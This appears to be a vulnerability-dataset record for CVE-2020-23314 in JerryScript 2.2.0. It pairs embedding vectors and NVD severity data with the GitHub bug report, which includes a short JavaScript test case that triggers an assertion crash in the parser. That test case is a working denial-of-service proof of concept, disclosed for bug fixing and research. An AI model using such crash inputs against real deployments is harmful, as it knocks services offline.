0.016465216875076294, 0.013358883559703827, 0.015696894377470016, 0.017630090937018394, 0.012978853657841682, -0.003932485356926918, 0.00020524722640402615, -0.00007403099880320951, 0.002271919045597315, -0.022967034950852394, 0.012474901042878628, 0.006472903769463301, -0.011929640546441078, -0.01454854290932417, 0.012491423636674881, 0.027890903875231743, 0.010202981531620026, -0.0018784638959914446, -0.01758052222430706, -0.016010832041502, -0.010723457671701908, 0.006555519066751003, 0.0022264807485044003, -0.015589495189487934, -0.014193297363817692, 0.00912072230130434, -0.017877936363220215, -0.002528026234358549, -0.00032168306643143296, -0.004754506982862949, -0.013714129105210304, 0.012797100469470024, 0.007984763011336327, 0.005163452122360468, 0.020984269678592682, 0.018852796405553818, -0.009979920461773872, 0.018604950979351997, 0.01706830784678459, -0.008550677448511124, 0.03190600499510765, -0.0036123511381447315, 0.0062828888185322285, -0.007898016832768917, -0.005097360350191593, -0.0068116262555122375, 0.01300363801419735, 0.02009202539920807, -0.006605088245123625, -0.02225654572248459, 0.006501819007098675, -0.00988078210502863, 0.005688059143722057, -0.0043166461400687695, 0.012532731518149376, 0.013681082986295223, 0.018720611929893494, 0.023793188855051994, 0.008930707350373268, 0.0039035698864609003, -0.031212037429213524, 0.008773738518357277, 0.009475967846810818, -0.021628668531775475, -0.0034884284250438213, -0.0073155793361365795, 0.014887265861034393, 0.002395841758698225, 0.02258700504899025, -0.01974504254758358, 0.01036821212619543, 0.01508554257452488, -0.006700095720589161, -0.004262946080416441, -0.003926289267838001, 0.0018980851164087653, 0.005477390252053738, 0.01665523089468479, 0.00016755402612034231, -0.008162385784089565, -0.016985692083835602, -0.011797456070780754, -0.010921734385192394, 0.00048923707799986, 0.004461222793906927, -0.018522335216403008, 0.010896950028836727, 0.014449404552578926, 0.021463438868522644, -0.006117658223956823, 0.013135822489857674, 0.037044670432806015, -0.02823788858950138, -0.027808288112282753, -0.017944028601050377, 0.0023504034616053104, 0.0029824101366102695, 0.0009025714825838804, 0.024123650044202805, -0.018059691414237022, -0.003420270746573806, 0.010929996147751808, -0.00195694831199944, -0.0031166598200798035, 0.016366077587008476, 0.0027159759774804115, -0.006287019699811935, -0.015490356832742691, -0.0068157571367919445, -0.010219505056738853, -0.020538147538900375, 0.007993023842573166, -0.006220927461981773, 0.03041893057525158, 0.009864259511232376, 0.017811845988035202, -0.00945118349045515, -0.004539707209914923, -0.013268006965517998, -0.022140882909297943, -0.006927287671715021, 0.002494980115443468, 0.0068198880180716515, 0.002034400124102831, -0.0022925727535039186, -0.019563287496566772, -0.0067414031364023685, 0.014416358433663845, 0.010161674581468105, -0.003418205538764596, -0.002257461426779628, -0.0024557379074394703, 0.0032694980036467314, 0.015201203525066376, -0.006402680650353432, 0.03286433964967728, 0.009401613846421242, -0.014061112888157368, -0.022768760100007057, -0.02683342806994915, -0.004304253961890936, 0.0077823554165661335, 0.0044488306157290936, -0.01287971530109644, -0.012921023182570934, -0.02390884980559349, 0.00866633839905262, -0.006844672374427319, -0.025808999314904213, 0.008311092853546143, 0.01725006103515625, 0.006183750461786985, -0.02024073339998722, 0.011491779237985611, 0.0038312815595418215, 0.019232826307415962, -0.020108548924326897, -0.06579477339982986, 0.006840541493147612, 0.012169224210083485, -0.0012175420997664332, 0.004936260636895895, -0.01966242678463459, 0.014763343147933483, 0.012854930944740772, 0.008360661566257477, -0.004132827278226614, -0.014945096336305141, -0.04259641468524933, 0.02699865959584713, -0.008393707685172558, 0.01478812750428915, -0.0008777868933975697, -0.018538858741521835, 0.020356394350528717, 0.005171713884919882, 0.012251839973032475, -0.003585501341149211, -0.010657365433871746, -0.010029490105807781, -0.013193652965128422, -0.004700806923210621, 0.015358172357082367, 0.016564354300498962, -0.013722390867769718, 0.0033397208899259567, 0.0054195597767829895, -0.001923902309499681, 0.015498618595302105, 0.0020591847132891417, 0.012945807538926601, -0.007551032584160566, -0.027610011398792267, -0.01733267679810524, -0.0016791546950116754, 0.015696894377470016, -0.013011899776756763, 0.00027831009356305003, -0.009252906776964664, 0.0031435098499059677, -0.011235672049224377, -0.0042092464864254, -0.004362084437161684, -0.009839475154876709, 0.02182694524526596, -0.02557767741382122, 0.008691122755408287, -0.02351229637861252, 0.006534865126013756, 0.015399480238556862, -0.011029134504497051, -0.0010058404877781868, 0.015531664714217186, -0.0024578033480793238, -0.008476323448121548, -0.008757214993238449, -0.026222076267004013, 0.005940035451203585, -0.018555382266640663, 0.01145047228783369, -0.005911120213568211, -0.003304609563201666, 0.0168369859457016, 0.0025775954127311707, 0.01809273660182953, 0.008443277329206467, -0.016357816755771637, 0.015069019049406052, 0.008658076636493206, 0.015077280811965466, 0.0067496648989617825, -0.0025837915018200874, 0.0009846703615039587, -0.013705868273973465, 0.002767610363662243, 0.0007492169388569891, 0.016878293827176094, 0.011376118287444115, 0.0071792639791965485, 0.013276268728077412, 0.006704226601868868, -0.0034223361872136593, 0.003628874197602272, -0.002067446243017912, 0.008748953230679035, 0.009525536559522152, -0.005427821073681116, 0.017977075651288033, 0.007137956563383341, 0.009773382917046547, 0.017530953511595726, 0.02248786762356758, -0.001423047506250441, 0.0013115168549120426, 0.003595828078687191, 0.005927643273025751, -0.0008566167671233416, 0.013920667581260204, 0.0036743127275258303, 0.01708483137190342, 0.015391218475997448, -0.0033438517712056637, -0.0024309533182531595, -0.007794747594743967, -0.0191667340695858, 0.004374476615339518, -0.02351229637861252, 0.016217371448874474, 0.0108804265037179, -0.002067446243017912, -0.0036309396382421255, 0.015564710833132267, 0.007067733444273472, 0.007274271454662085, 0.009236383251845837, -0.024272356182336807, -0.004238161724060774, -0.02873357944190502, -0.006890110671520233, -0.01200399361550808, -0.003486362984403968, 0.008897661231458187, -0.0009454280952923, -0.00599786639213562, 0.002618903061375022, 0.0041163042187690735, -0.005568266846239567, 0.02300008200109005, 0.010929996147751808, -0.00007712907245149836, 0.015688633546233177, 0.020439010113477707, -0.014408097602427006, 0.013309314846992493, -0.0043083843775093555, 0.02200869843363762, -0.011053918860852718, -0.021612146869301796, -0.011136533692479134, 0.02073642425239086, -0.00991382822394371, -0.017563998699188232, 0.003195144236087799, -0.0231487900018692, 0.011516563594341278, 0.01511858869343996, -0.007402325049042702, 0.0032777595333755016, 0.00043140642810612917, -0.010855642147362232, 0.01354063767939806, 0.0026560798287391663, -0.006869456730782986, 0.010202981531620026, 0.010401258245110512, -0.0053823827765882015, 0.0028316371608525515, -0.00399857759475708, 0.003841608529910445, 0.003973792772740126, 0.00896375346928835, -0.011780932545661926, 0.003184817498549819, -0.006555519066751003, -0.0003056763671338558, -0.010153412818908691, 0.0108804265037179, 0.01212791632860899, 0.017894459888339043, -0.013028423301875591, 0.0005937970126979053, 0.010723457671701908, -0.0035028860438615084, -0.014556804671883583, -0.011739625595510006, 0.0010512789012864232, -0.02025725692510605, -0.00389530835673213, 0.00002401005258434452, -0.006617480423301458, 0.009938612580299377, -0.0077823554165661335, -0.027213459834456444, 0.004799945279955864, 0.005733497440814972, 0.017861414700746536, -0.0012691766023635864, 0.019563287496566772, 0.0345001220703125, 0.0030732867307960987, -0.011640487238764763, -0.0012650458374992013, 0.0031641635578125715, -0.007526248227804899, 0.010525180958211422, -0.0009939646115526557, -0.0010363048641011119, 0.013838051818311214, 0.008476323448121548, 0.015044234693050385, 0.023694049566984177, 0.0019187388243153691, -0.017530953511595726, 0.004956914111971855, -0.009831213392317295, -0.007038818206638098, 0.0013414649292826653, 0.020141594111919403, 0.0008416427299380302, -0.009517275728285313, 0.013986759819090366, -0.007794747594743967, -0.012871453538537025, -0.0015552318654954433, 0.011343072168529034, -0.001523218466900289, 0.010690411552786827, 0.02250439114868641, 0.007489071227610111, 0.018869319930672646, -0.00122373818885535, 0.0030361099634319544, 0.0007791649550199509, 0.008674600161612034, 0.0231487900018692, 0.016952646896243095, 0.011425687000155449, -0.009897305630147457, -0.003963465802371502, 0.013094514608383179, 0.016456956043839455, -0.013135822489857674, 0.001352824503555894, -0.003048502141609788, -0.00803433172404766, 0.0053534675389528275, -0.005423690192401409, 0.02633773721754551, -0.008839830756187439, -0.002819244982674718, -0.0191667340695858, -0.011657009832561016, 0.02475152537226677, -0.00012314833293203264, 0.011508302763104439, 0.004337300080806017, -0.009897305630147457, 0.006642265245318413, -0.01865451969206333, -0.014218082651495934, 0.02448715642094612, 0.004552099388092756, -0.009385091252624989, -0.004473614972084761, 0.0031352483201771975, -0.0111613180488348, 0.0055434824898839, 0.001632683677598834, -0.007026426028460264, 0.027378689497709274, 0.006939679849892855, -0.018538858741521835, 0.012565777637064457, 0.000981055898591876, -0.01743181422352791, -0.01857190579175949, 0.009095937944948673, 0.005142798647284508, -0.007009902969002724, -0.01199573278427124, 0.0164982620626688, -0.0017607372719794512, -0.008649814873933792, -0.0021583230700343847, 0.006047435570508242, -0.024388017132878304, -0.01558123342692852, -0.009128984063863754, -0.028303980827331543, -0.0124583775177598, 0.0066794417798519135, 0.002094296272844076, -0.0024495418183505535, -0.020224209874868393, -0.020885132253170013, -0.008021939545869827, 0.004180330783128738, 0.01196268666535616, -0.005407167132943869, -0.008658076636493206, 0.002418561140075326, -0.025528108701109886, -0.01470551174134016, 0.02174432948231697, 0.021066885441541672, 0.026205552741885185, 0.006687703542411327, -0.005840897094458342, 0.008075639605522156, -0.019133688881993294, -0.01466420479118824, 0.012342716567218304, -0.0028171795420348644, 0.014713773503899574, -0.016019094735383987, -0.004477745853364468, 0.0005269303219392896, 0.006084612105041742, -0.00183818896766752, 0.006803364958614111, -0.008509369567036629, 0.0041204351000487804, 0.010219505056738853, 0.007592340465635061, -0.017613569274544716, -0.005659143906086683, -0.025709861889481544, 0.014052852056920528, 0.009938612580299377, -0.025115031749010086, 0.0038643276784569025, -0.002057119505479932, 0.015052496455609798, 0.014763343147933483, 0.0028564217500388622, 0.01625867933034897, 0.01200399361550808, 0.004700806923210621, 0.003312871092930436, -0.021099930629134178, 0.01057475060224533, -0.014193297363817692, 0.01906759664416313, -0.017597045749425888, -0.016275200992822647, -0.032699111849069595, -0.007080125622451305, 0.0008726234664209187, 0.004170004278421402, -0.0073155793361365795, -0.0018722678069025278, -0.008757214993238449, -0.010921734385192394, 0.02551158517599106, 0.00007235287193907425, 0.02374361827969551, -0.006357242353260517, -0.013102776370942593, 0.013424975797533989, 0.016308248043060303, 0.023627957329154015, 0.01012036669999361, 0.0013879359466955066, 0.009525536559522152, -0.021347777917981148, -0.004721460863947868, 0.014259389601647854, -0.006431596353650093, -0.01976156421005726, 0.0037734508514404297, -0.023793188855051994, -0.02708127535879612, 0.01308625377714634, 0.02774219587445259, 0.009971658699214458, 0.016564354300498962, -0.00900506041944027, 0.009219860658049583, 0.0039490084163844585, 0.025048939511179924, 0.0755433738231659, 0.0015345780411735177, -0.017464861273765564, 0.014631158672273159, 0.012631869874894619, -0.014903788454830647, -0.019645903259515762, 0.05333639681339264, 0.012450115755200386, 0.014845957979559898, 0.006720749661326408, 0.005179975181818008, -0.004287730902433395, -0.015399480238556862, 0.00040094208088703454, -0.0095833670347929, 0.0238262340426445, -0.008525892160832882, 0.0006469805957749486, 0.006468772888183594, -0.013358883559703827, -0.00888113770633936, 0.0053080287761986256, -0.010905210860073566, -0.005369990598410368, -0.006253973580896854, -0.013681082986295223, -0.022438298910856247, -0.02542896941304207, 0.0097899055108428, -0.01743181422352791, -0.006803364958614111, 0.006687703542411327, 0.009707290679216385, -0.013358883559703827, 0.005469128489494324, -0.0016171932220458984, 0.04025014489889145, -0.012780576944351196, -0.01791098341345787, 0.014399835839867592, 0.0007543803658336401, 0.009071152657270432, -0.0063531119376420975, 0.01576298661530018, -0.00289566395804286, -0.014622896909713745, -0.0002323553489986807, 0.013391929678618908, -0.01212791632860899, 0.0033913555089384317, 0.009979920461773872, -0.004676022566854954, -0.009162030182778835, 0.012499685399234295, -0.0027634797152131796, 0.012284886091947556, 0.011731363832950592, 0.00857546180486679, -0.008356531150639057, 0.006985118146985769, 0.0023070306051522493, 0.013499329797923565, -0.0022037613671272993, -0.0072494870983064175, -0.009021583944559097, 0.006460511591285467, -0.015936478972434998, -0.019678950309753418, -0.01900150440633297, -0.0004721977165900171, -0.01188007090240717, -0.003975858446210623, -0.0009753761696629226, 0.00803846213966608, -0.000046374254452530295, 0.028849240392446518, -0.002418561140075326, -0.017795322462916374, -0.013234960846602917, 0.00610526604577899, 0.005403036717325449, -0.021975653246045113, 0.010525180958211422, 0.00028424806077964604, 0.01033516600728035, -0.005233675241470337, 0.0008607474737800658, -0.005027137231081724, 0.016952646896243095, -0.0026250991504639387, -0.015614279545843601, -0.006485295947641134, -0.01825796812772751, -0.0011080768890678883, -0.02575943060219288, 0.01445766631513834, 0.010046012699604034, 0.01791098341345787, -0.012152701616287231, 0.0034822323359549046, -0.0014591916697099805, 0.005605443846434355, 0.0001681994617683813, -0.011409164406359196, 0.012830146588385105, 0.009484229609370232, 0.014383312314748764, 0.02090165577828884, -0.03142683580517769, 0.001380707137286663, 0.009170291014015675, 0.0021314730402082205, 0.008294569328427315, 0.00004392161645228043, -0.00655964994803071, 0.006006127689033747, 0.0038932431489229202, 0.008591984398663044, -0.008067377842962742, 0.00988078210502863, 0.015325126238167286, -0.0035896319895982742, 0.012772315181791782, 0.007080125622451305, 0.015225987881422043, 0.012565777637064457, 0.010128628462553024, 0.003728012554347515, 0.02258700504899025, 0.023776665329933167, -0.0013290726346895099, -0.0031765559688210487, -0.0062828888185322285, 0.02683342806994915, 0.00048071739729493856, 0.006960333790630102, -0.004178265575319529, -0.010202981531620026, 0.024966323748230934, 0.02648644521832466, -0.004341430496424437, 0.01801012083888054, 0.005101490765810013, 0.014234605245292187, 0.01857190579175949, 0.004428176674991846, 0.005072575528174639, 0.02567681483924389, -0.018720611929893494, -0.0040027080103755, -0.026552537456154823, 0.02648644521832466, -0.014416358433663845, 0.02699865959584713, -0.014507235959172249, -0.021645192056894302, 0.0036247435491532087, 0.03230255842208862, 0.010954780504107475, -0.0024392148479819298, -0.0067496648989617825, 0.0031414444092661142, 0.006443988531827927, 0.017035262659192085, -0.011095226742327213, -0.005601312965154648, -0.00879026111215353, 0.010839119553565979, 0.0009774415520951152, 0.010227765887975693, 0.004927998874336481, -0.011095226742327213, 0.007195787038654089, -0.007484940346330404, 0.0028254410717636347, -0.00300099840387702, -0.00988078210502863, -0.026354260742664337, -0.010178197175264359, -0.012904499657452106, 0.01834058202803135, 0.006960333790630102, 0.042199861258268356, -0.020224209874868393, 0.012887977063655853, 0.018968459218740463, 0.0052791135385632515, 0.007294925395399332, 0.000762125535402447, 0.008492846041917801, 0.04210072383284569, 0.005394774954766035, -0.001090521109290421, -0.01741529256105423, -0.0003170359705109149, 0.006406811531633139, -0.01145873311907053, -0.017811845988035202, 0.007422978989779949, 0.0032694980036467314, -0.003504951484501362, 0.014953358098864555, 0.019398057833313942, -0.008955491706728935, 0.04418262839317322, -0.0053121596574783325, -0.0016832854598760605, -0.019183257594704628, -0.005539351608604193, -0.0003487911890260875 ]
247
CVE-2020-23314
2021-06-10T23:15:08.087000
There is an Assertion 'block_found' failed at js-parser-statm.c:2003 parser_parse_try_statement_end in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3825" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3825
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` var errorMessage = "toStringThrows" var toStringThrows = { "foo//bar/baz//foo" } try { var obj = {}; obj[toStringThrows] = 3; assert(false); } catch (e) { assert(e.message == errorMessage); } ``` ###### Output ``` ICE: Assertion 'block_found' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_try_statement_end):2003. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'block_found' in parser_parse_try_statement_end
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3825/comments
0
2020-06-01T04:41:43
2020-06-03T13:28:15Z
https://github.com/jerryscript-project/jerryscript/issues/3825
628,146,890
3,825
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion 'block_found' in parser_parse_try_statement_end Issue date: --- start body --- ###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` var errorMessage = "toStringThrows" var toStringThrows = { "foo//bar/baz//foo" } try { var obj = {}; obj[toStringThrows] = 3; assert(false); } catch (e) { assert(e.message == errorMessage); } ``` ###### Output ``` ICE: Assertion 'block_found' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_try_statement_end):2003. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337. --- end body ---
1,078
[ -0.00524605019018054, 0.01217024214565754, -0.005795530043542385, -0.008598621934652328, 0.010759415104985237, 0.013944914564490318, -0.02367219887673855, 0.036978527903556824, -0.05245307460427284, 0.025513699278235435, -0.0012957334984093904, 0.01679627038538456, 0.008457538671791553, -0.014308759942650795, -0.004191642161458731, 0.011034155264496803, 0.0013542086817324162, 0.006771971471607685, -0.009511946700513363, -0.028691772371530533, 0.001144440844655037, 0.00004724995233118534, -0.03522613272070885, 0.03775076940655708, 0.012548938393592834, -0.012704871594905853, -0.00653807120397687, -0.0016484403749927878, -0.02508302591741085, -0.020167406648397446, -0.01064060814678669, 0.0028346492908895016, -0.013662748970091343, 0.026776017621159554, 0.048710670322179794, 0.0005304525257088244, 0.032582685351371765, 0.04972052574157715, -0.017687320709228516, -0.006998446304351091, -0.005684148985892534, -0.028201695531606674, -0.02089509554207325, 0.026582958176732063, 0.002949743065983057, 0.03528553619980812, 0.021994056180119514, -0.01642500050365925, -0.042681239545345306, 0.031127307564020157, 0.005687861703336239, 0.021904950961470604, 0.02186039835214615, -0.057591456919908524, 0.04081003740429878, -0.0005480878753587604, 0.0334143303334713, -0.0149770462885499, 0.015623056329786777, -0.0018823407590389252, -0.015816116705536842, -0.0025803290773183107, -0.004135951865464449, 0.0032783171627670527, 0.03451329097151756, 0.04327527433633804, -0.0015055013354867697, 0.0006060988525860012, 0.007391992956399918, 0.013536517508327961, 0.011836099438369274, 0.00572127616032958, 0.032196566462516785, 0.03683001920580864, -0.004492371343076229, -0.009719857946038246, -0.002350141294300556, 0.026642361655831337, -0.007707572542130947, -0.05494801327586174, -0.01868232525885105, 0.006541783921420574, -0.034780606627464294, -0.01621708832681179, 0.0056098951026797295, 0.015489399433135986, -0.01024706196039915, -0.06985823065042496, -0.016335895285010338, -0.012771700508892536, 0.01623193919658661, 0.05025515705347061, -0.01860807090997696, 0.010365867987275124, -0.0005689717945642769, 0.029998645186424255, -0.0012261203955858946, 0.014368162490427494, -0.05182934179902077, 0.0006515794666483998, 0.01667746528983116, 0.020642632618546486, -0.012006883509457111, 0.001276241848245263, 0.012370727956295013, 0.03558254987001419, -0.005795530043542385, -0.003946603741496801, 0.06041311100125313, 0.1173214316368103, -0.009883216582238674, -0.002283312613144517, 0.01312069408595562, -0.03356283903121948, -0.012140540406107903, 0.010714862495660782, 0.02719184011220932, 0.0021682188380509615, -0.025974074378609657, 0.03225596994161606, -0.05123531073331833, -0.003449101699516177, -0.018385307863354683, -0.00873227883130312, -0.0024633787106722593, 0.030681781470775604, 0.05034426227211952, 0.012868230231106281, 0.015400294214487076, -0.006504656746983528, -0.0356716550886631, -0.021429724991321564, 0.010291614569723606, -0.01355136837810278, 0.036414194852113724, 0.024756306782364845, -0.0267314650118351, 0.01679627038538456, -0.023033613339066505, -0.05168083310127258, -0.06344267725944519, -0.0037108471151441336, 0.037067633122205734, -0.002058694139122963, -0.014115698635578156, 0.020197106525301933, -0.027919530868530273, 0.018652623519301414, -0.013647898100316525, -0.006151949986815453, -0.014902791939675808, 0.001904616947285831, 0.021815845742821693, 0.006326446775346994, 0.026256239041686058, -0.01473200786858797, 0.016944779083132744, 0.05465099588036537, -0.005698999855667353, 0.005784392356872559, -0.027800723910331726, -0.059195347130298615, -0.007974887266755104, 0.010893072001636028, -0.027978934347629547, 0.002314870711416006, -0.011049006134271622, 0.022692043334245682, 0.016142835840582848, 0.023107867687940598, -0.01955852285027504, 0.0045889015309512615, 0.0061333863995969296, 0.02930065616965294, -0.04327527433633804, -0.007269473746418953, -0.006307883188128471, 0.027028482407331467, 0.0020308487582951784, -0.01660321094095707, 0.005472525022923946, 0.008004589006304741, -0.0214594267308712, -0.03546374291181564, -0.0004362426698207855, -0.028647221624851227, 0.0037591124419122934, -0.042592134326696396, -0.005446536000818014, -0.026181984692811966, -0.01887538470327854, -0.015890371054410934, 0.003031422384083271, 0.0020197108387947083, 0.03938435763120651, 0.029063044115900993, -0.006512082181870937, -0.03962197154760361, -0.010447547771036625, -0.024073170498013496, 0.04882947728037834, -0.014598350040614605, -0.030770886689424515, -0.03537464141845703, -0.012593490071594715, -0.02116241119801998, -0.0023519976530224085, 0.005862358957529068, 0.030399616807699203, 0.005153232719749212, -0.019038744270801544, -0.0038834880106151104, 0.014702306129038334, -0.03071148321032524, -0.01851896569132805, 0.00815309677273035, 0.03683001920580864, 0.0012966616777703166, -0.01917240209877491, -0.03412717208266258, -0.004696569871157408, -0.0254839975386858, -0.04419602453708649, 0.0011667171493172646, -0.04719588905572891, -0.022914806380867958, -0.03997839242219925, 0.006827661767601967, -0.04701767861843109, 0.028736324980854988, 0.013373157940804958, -0.0034323944710195065, -0.019350610673427582, -0.0019380312878638506, 0.022959358990192413, 0.011739568784832954, -0.02393951267004013, -0.016157686710357666, 0.008234776556491852, -0.0035047922283411026, 0.018489263951778412, -0.012467258609831333, -0.04719588905572891, -0.025320637971162796, 0.0028216547798365355, 0.03166193515062332, -0.01783582754433155, -0.031632233411073685, -0.020761437714099884, 0.015385443344712257, -0.004098824691027403, -0.04859186336398125, -0.01425678189843893, -0.010143105871975422, -0.006549208890646696, 0.04092884436249733, 0.006675440818071365, 0.015533952042460442, 0.007221208419650793, -0.016736866906285286, 0.027815574780106544, 0.008977317251265049, -0.037067633122205734, -0.0029683064203709364, 0.021979205310344696, 0.0010256343521177769, -0.04342377930879593, 0.0017923075938597322, -0.01746455766260624, -0.00014038660447113216, 0.051265012472867966, -0.044403932988643646, -0.019202101975679398, 0.010610906407237053, -0.01658836007118225, -0.015786414965987206, 0.005027000792324543, 0.0160240288823843, -0.010328741744160652, -0.024281080812215805, 0.012214794754981995, 0.02328607626259327, 0.0084946658462286, 0.027236392721533775, 0.009341162629425526, 0.012110838666558266, 0.04449303820729256, 0.004715133458375931, -0.013826108537614346, -0.04226541891694069, -0.015140404924750328, -0.020538676530122757, -0.0021867824252694845, 0.0016363740433007479, -0.0018665617099031806, 0.0018767716828733683, 0.005335154943168163, -0.022098012268543243, -0.0007128390716388822, 0.003894626162946224, -0.018578369170427322, -0.015578504651784897, -0.010536652989685535, 0.005472525022923946, -0.041641682386398315, 0.000258032901911065, 0.004006007220596075, 0.0160240288823843, -0.010447547771036625, -0.038879431784152985, 0.04796813055872917, -0.03876062482595444, 0.007109827362000942, -0.003274604445323348, -0.03445388749241829, 0.007399418391287327, 0.045384086668491364, -0.01063318271189928, -0.028929386287927628, 0.031038202345371246, -0.022112863138318062, -0.028751175850629807, -0.032493580132722855, 0.02098420076072216, 0.06249222531914711, -0.010105978697538376, -0.023731600493192673, 0.031127307564020157, -0.04205750674009323, -0.011138110421597958, 0.03044416941702366, -0.011256917379796505, -0.018548667430877686, 0.007017009891569614, -0.04277034476399422, -0.058452803641557693, -0.041819892823696136, 0.015949774533510208, 0.022974209859967232, -0.03843390569090843, -0.03166193515062332, -0.0056730108335614204, -0.008071417920291424, -0.016380447894334793, -0.0046074651181697845, 0.004228769335895777, 0.034780606627464294, 0.005015862639993429, 0.01831105351448059, -0.006081408355385065, 0.0008938334067352116, 0.0345429927110672, 0.0019733018707484007, -0.0013839103048667312, 0.04761170968413353, -0.04199810326099396, -0.030206555500626564, -0.0025432019028812647, 0.013261777348816395, 0.000991291832178831, 0.002006716327741742, -0.019707029685378075, 0.0009810819756239653, 0.013573644682765007, 0.027993785217404366, -0.02318212017416954, 0.01345483772456646, -0.0009560211910866201, -0.04039421305060387, -0.01984068751335144, -0.03100850060582161, 0.02364249713718891, -0.0108707956969738, -0.012044010683894157, -0.023256374523043633, -0.026167135685682297, 0.012949910014867783, 0.026493852958083153, -0.004830227233469486, 0.024741455912590027, -0.013083567842841148, -0.0005443751579150558, 0.03561225160956383, -0.016291342675685883, 0.018919937312602997, 0.029597673565149307, 0.006025718059390783, 0.011969756335020065, 0.0034156872425228357, -0.010692586190998554, 0.0008441759855486453, 0.0545915924012661, -0.02832050248980522, -0.05254217982292175, 0.012199943885207176, 0.011264342814683914, -0.04226541891694069, -0.02690967544913292, 0.02298906072974205, -0.04104765132069588, 0.0010312034282833338, -0.023597944527864456, -0.013878085650503635, -0.033533137291669846, -0.017984336242079735, 0.026657212525606155, 0.009378288872539997, -0.04214661195874214, -0.001512926653958857, 0.021697038784623146, 0.022172266617417336, -0.02604832872748375, -0.0018071584636345506, 0.01984068751335144, 0.04226541891694069, 0.023612795397639275, 0.04036451503634453, -0.032671790570020676, -0.02099905163049698, -0.003204063279554248, -0.006341297645121813, -0.0203307643532753, 0.027993785217404366, -0.031157009303569794, -0.000010441978702147026, -0.014390438795089722, -0.01785067841410637, -0.015519101172685623, -0.011865800246596336, -0.003133521880954504, -0.02355339191854, -0.019870389252901077, 0.02061293087899685, 0.06474955379962921, -0.005368569400161505, -0.04238422214984894, -0.032018356025218964, -0.03365194424986839, -0.00656034704297781, 0.019721880555152893, 0.01592007279396057, 0.029701627790927887, -0.02309301681816578, -0.0031520852353423834, -0.009497095830738544, -0.008672875352203846, -0.050611574202775955, -0.002084683161228895, 0.019484268501400948, 0.021904950961470604, 0.008271903730928898, 0.05779936909675598, -0.025409743189811707, 0.005762116052210331, 0.008910488337278366, 0.02499392069876194, -0.026078030467033386, -0.0015194239094853401, 0.008286754600703716, -0.0031966378446668386, -0.0337410494685173, 0.007960036396980286, 0.0027102737221866846, 0.0012920208973810077, -0.022974209859967232, 0.0171526912599802, 0.011286619119346142, -0.02671661414206028, 0.0035047922283411026, -0.03947346284985542, 0.010603480972349644, 0.005468812305480242, 0.004830227233469486, 0.011130684986710548, 0.0019083296647295356, -0.013343456201255322, 0.02040501870214939, -0.026479002088308334, 0.031454022973775864, 0.00412852643057704, 0.015771564096212387, -0.019216952845454216, -0.01871202513575554, 0.01667746528983116, 0.023583093658089638, 0.0003387842152733356, 0.016736866906285286, -0.0007926622056402266, -0.004781962372362614, 0.031899549067020416, 0.04265153780579567, -0.02527608536183834, -0.03445388749241829, -0.03139462321996689, -0.018088292330503464, -0.014672604389488697, -0.03175104036927223, -0.011011878959834576, 0.012058861553668976, 0.0032133448403328657, 0.02316727116703987, -0.03421627730131149, 0.032285671681165695, 0.011182663030922413, -0.016098283231258392, -0.009341162629425526, -0.0406615287065506, 0.04900768771767616, -0.011761845089495182, -0.015266637317836285, -0.025216681882739067, -0.06938300281763077, 0.005565342493355274, -0.01642500050365925, -0.01563790813088417, -0.02021195739507675, 0.002274031052365899, 0.029152149334549904, 0.029018491506576538, 0.01804373972117901, -0.012051436118781567, -0.027013631537556648, -0.024088021367788315, 0.03371134772896767, 0.016722016036510468, 0.017226943746209145, 0.005539353936910629, -0.009244631975889206, -0.041255563497543335, -0.0326123870909214, -0.016261640936136246, 0.010670309886336327, -0.018934788182377815, 0.04740379750728607, 0.0023631358053535223, 0.011256917379796505, -0.023984065279364586, 